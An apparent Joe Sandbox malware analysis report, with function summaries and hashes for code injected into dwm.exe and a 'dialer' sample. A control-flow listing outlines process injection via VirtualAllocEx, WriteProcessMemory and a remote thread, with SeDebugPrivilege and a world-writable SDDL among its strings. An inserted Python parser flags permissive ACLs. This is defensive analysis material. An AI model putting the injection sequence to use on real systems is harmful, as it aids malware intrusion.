                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: ee6e919353f53969156d5f988679b3d41b25326c60cb110f8e4a7beea7a4d70f
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: FF31C431612F40D5EE29DB52A4407E52398B74CFA0F5909A5BF2E07799FF3AC54DA300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: b60d945665661dfdd3a418f256b783154abc990a5eb3c260b0a1a8428369d64f
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: EF118835260F808AE7948B12E8443D9B7A0F78CFE5F180264FF1A877A8CB3AC9158744
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: 3b51e744a85cbf46458d55d723a01e3b83cbf2ae4066660c87d7deb4b190fe3c
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: 92318E36701F5186EA18DF16E9407EA67A4FB5CF84F0841A4BF4847B6AFF36C4A1A740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: c0ab62e2f35622036f03bde80c5d5bf817e5228cb12c0170516359f531fc01fc
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: 75115C30200B8046FA6CA77195553ED62466B9CBB4F2847E4BA36467DEFF6A8802B600
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 581595d2693ef0f1e2eb2c5f1b19eadae3bdc356db7fcbf3ada764333d5ee646
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: A7015B35340F4086EA28DB56A4487DA63A5F78CFC4F5840B5EF5943759DF39C94AC700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: eb78499ad2163625bc5385763271bd5f74659e694133aceb65f3d280cb71e29c
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: C70157B8611F4086EB289B22E8497DA73A4BB5CB82F1404A4EF4907768EF3EC549D700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: f668ebae7a626b22d9dbcf421f7ee727c1ac91f227238c048c81f3755eb3b7c4
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: 51518C32A41B00DAEB18CB25E848BD93796F348F88F5085A4FB164778CFB76C849E701
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: 2e86e042b2e4b659e6ba9be687937ce213fa3ee14a4a065a8680f4058dc28321
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 6EF08C36300B4082EB348F24E8843EA6760F74CB88F945060EB4946A59DB7EC68EDB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 3fec79fad032051565755a825fa537cda261f8238bcd5913236774933117935a
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: F0F05E38604F8082EA088B16B9142DA63A4AB4CFC0F0441A0FF4607B2DDF69C4469700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: a5eb62537fb6bfe5a65e3d9d1881e9253be8d97531b25be878754bf50b40c016
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: 03F06275211F0586EB188B24E4443D96360EB8CB61F5402D9FF6A453E8DF2EC046A340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                                • Instruction ID: c4f96b38a82fae5d64a94be9159ff439f89e26c302612a513b778999d4a90a11
                                                                                • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                                • Instruction Fuzzy Hash: 6761B676519B44C6EB68CB16E44439AB7A0F388B98F100195FB8E47BACEB7EC554DB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 7d068ccff395479a1a8ca0a41ff6f0b5cb44583eea117e209bbb97da9ecab023
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: E2117332A94F5111FAAC2528E4D63F911C16B5D374FC9CEA8BB66067FECB26CC417111
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: a2d60e80db169666c09dbc83c644de45b92b3f83fc807ebd1f64cfc93a8147fb
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 7011913AAD0F5419F76C1568D4513E719406B6C3B8F0806A4BB76067DECB26CA477A00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 228dfb1950d3e10129388516a8d777bff4db30c7cbbd236b43f5bc3b611ebec5
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: DC61B53A500F4046FA6DDBA9EDC03FA6BA0E74D740F504895FB0A177ACDBB6C842A300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: ddc40d19ef3e0178d7ccbb8309058d683924762c3a0cfda7ada99cbc9f56b684
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: 51615632A00F848AEB28DF65D4803DD7BA4F758B88F045296EF4917B98EB39D595E700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 5beecf0a36cf43612fa9d680f2f1ada95d0d57731be6607b75cf6f462d35859a
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: EA518E32900B80CAEB788B15D5943DD77A0F759B84F184256FB9987BD9CBBAD490F700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 68162fd14037d65bd51b88a781ac837c3e6c9958c476ba7a276518bf1858e3f8
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 87517F72100B808AEF688B2594843D97BA8F358F85F1881D5FB5987BD9EB39D450F740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337600267.000001160CBB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CBB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbb0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000029.00000002.3337666071.000001160CBE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CBE0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_41_2_1160cbe0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0

                                                                                Execution Graph

                                                                                Execution Coverage:48.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:227
                                                                                Total number of Limit Nodes:23

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000003E.00000002.3306973735.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                                • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                • API String ID: 4177739653-1130149537
                                                                                • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                                • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
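The string table above carries the SDDL `D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)`, and the same function's API ID lists Convert, Descriptor, Security and String, consistent with ConvertStringSecurityDescriptorToSecurityDescriptorW; the report does not say which object receives the resulting descriptor. The parser below is an added example, not part of the Joe Sandbox report or of the sample: it decodes the D: section of an SDDL string and flags allow ACEs that grant a write-class right to a broad, low-privilege group. Run on the report's descriptor it shows why the string matters: Authenticated Users receive GENERIC_ALL with OI/CI inheritance, so any local account can open the object for write. The alias tables cover only the common well-known SIDs and rights, hex access masks are kept as-is rather than expanded, and the tighter comparison descriptor is constructed for the example.

```python
import re

ACE_RE = re.compile(r"\(([^)]*)\)")

# Common SDDL aliases only; anything else is passed through untranslated.
TRUSTEES = {
    "AU": "Authenticated Users", "BA": "Builtin Administrators", "BU": "Builtin Users",
    "WD": "Everyone", "IU": "Interactive Users", "AN": "Anonymous", "SY": "Local System",
}
RIGHTS = {
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
    "FA": "FILE_ALL_ACCESS", "FR": "FILE_GENERIC_READ", "FW": "FILE_GENERIC_WRITE",
    "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
ACE_FLAGS = {"OI": "OBJECT_INHERIT", "CI": "CONTAINER_INHERIT", "NP": "NO_PROPAGATE",
             "IO": "INHERIT_ONLY", "ID": "INHERITED"}
BROAD_TRUSTEES = {"AU", "BU", "WD", "IU", "AN"}
WRITE_RIGHTS = {"GA", "GW", "FA", "FW", "WD", "WO"}


def _pairs(field):
    """SDDL packs two-letter aliases back to back ("OICI" -> ["OI", "CI"])."""
    return [field[i:i + 2] for i in range(0, len(field), 2)]


def parse_dacl(sddl):
    """Return the ACEs of the D: section as dicts; O:, G: and S: parts are ignored.

    The D: section is located by its first occurrence, which is correct for the
    usual O:...G:...D:...S: layout.
    """
    start = sddl.find("D:")
    if start < 0:
        return []
    body = sddl[start + 2:]
    sacl = body.find("S:")
    if sacl >= 0:
        body = body[:sacl]
    aces = []
    for raw in ACE_RE.findall(body):
        fields = (raw.split(";") + [""] * 6)[:6]
        ace_type, flags, rights, _object_guid, _inherit_guid, trustee = fields
        aces.append({
            "type": ace_type,
            "flags": _pairs(flags),
            # Rights may be a hex mask instead of aliases; a mask is kept as one item.
            "rights": [rights] if rights.startswith("0x") else _pairs(rights),
            "trustee": trustee,
        })
    return aces


def describe(ace):
    """Human-readable rendering of one parsed ACE."""
    kind = {"A": "Allow", "D": "Deny"}.get(ace["type"], ace["type"])
    who = TRUSTEES.get(ace["trustee"], ace["trustee"])
    rights = ", ".join(RIGHTS.get(r, r) for r in ace["rights"])
    flags = ", ".join(ACE_FLAGS.get(f, f) for f in ace["flags"]) or "no inheritance"
    return f"{kind} {who}: {rights} ({flags})"


def overly_permissive(sddl):
    """Allow ACEs that hand a write-class right to a broad, low-privilege group."""
    return [ace for ace in parse_dacl(sddl)
            if ace["type"] == "A" and ace["trustee"] in BROAD_TRUSTEES
            and WRITE_RIGHTS & set(ace["rights"])]


# The descriptor from the report's string table, and a constructed tighter one
# (protected DACL, administrators and SYSTEM only) for comparison.
REPORT_SDDL = "D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)"
TIGHT_SDDL = "D:P(A;;GA;;;BA)(A;;GA;;;SY)"

if __name__ == "__main__":
    for label, sddl in (("report", REPORT_SDDL), ("tight", TIGHT_SDDL)):
        print(label)
        for ace in parse_dacl(sddl):
            print("  " + describe(ace))
        print("  broad write access:", [a["trustee"] for a in overly_permissive(sddl)])
```

When hunting for the object this descriptor protects, the same check can be pointed at the SDDL returned by `Get-Acl ... | Select-Object -ExpandProperty Sddl` for a suspected pipe, file mapping or registry key.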

Control-flow Graph for 1400010c0 (figure rendered as text; the executed/not-executed colouring is lost). API sequence in address order: call 1400018ac (OpenProcess, IsWow64Process, CloseHandle); OpenProcess; OpenProcess; K32GetModuleFileNameExW; PathFindFileNameW, lstrlenW; StrCpyW; CloseHandle; StrCmpIW in a loop (1400011d8) over the embedded name list; NtQueryInformationProcess; OpenProcessToken; GetTokenInformation, GetLastError, LocalAlloc, GetTokenInformation, GetSidSubAuthorityCount, GetSidSubAuthority, LocalFree (reads a SID sub-authority from the target's token); CloseHandle; call 140001ec4 three times, then 140001ec4 with StrStrA in a loop, then 140001ec4 twice; VirtualAllocEx; WriteProcessMemory; call 14000211c; WaitForSingleObject; GetExitCodeThread; CloseHandle; CloseHandle.
Memory Dump Source
• Source File: 0000003E.00000002.3306536859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.3306381991.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.3306798080.0000000140003000.00000002.00000001.00020000.00000000.sdmp
